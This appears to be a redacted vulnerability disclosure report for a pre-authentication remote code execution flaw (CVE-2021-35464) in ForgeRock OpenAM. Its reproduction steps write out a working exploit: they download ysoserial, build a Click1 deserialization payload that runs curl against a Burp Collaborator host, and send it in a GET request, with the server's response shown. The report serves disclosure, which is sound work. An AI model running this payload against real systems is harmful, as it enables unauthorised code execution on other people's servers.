Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)

RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM. ## Impact An unauthenticated, 3rd-party attacker or adversary can execute remote code ### Supporting Material/References - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 ## System Host(s) █████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-35464 ## Steps to Reproduce ## Steps To Reproduce Target domain: █████ First we need to build the payload: 1. Download this jar file ``wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar`` then ``java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt`` You need to change the burp Collaborator id to test it properly. The payload is now saved in the payload.txt file. Now we need to use the following request: ``` GET /██████████=XYZ HTTP/1.1 Host: 127.0.0.1 ``` Replace **XYZ** by the payload saved into the payload.txt file. The response ``` HTTP/1.1 302 302 Date: Thu, 01 Jul 2021 18:11:52 GMT Server: Apache Set-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure; X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://██████████; img-src 'self' https://████████ Cache-Control: no-cache, private X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Cache-Control: private Location: https://127.0.0.1:443/sso/base/AMInvalidURL Content-Length: 0 X-XSS-Protection: 1; mode=block ``` The HTTP Request sent the collaborator : █████ ## Suggested Mitigation/Remediation Actions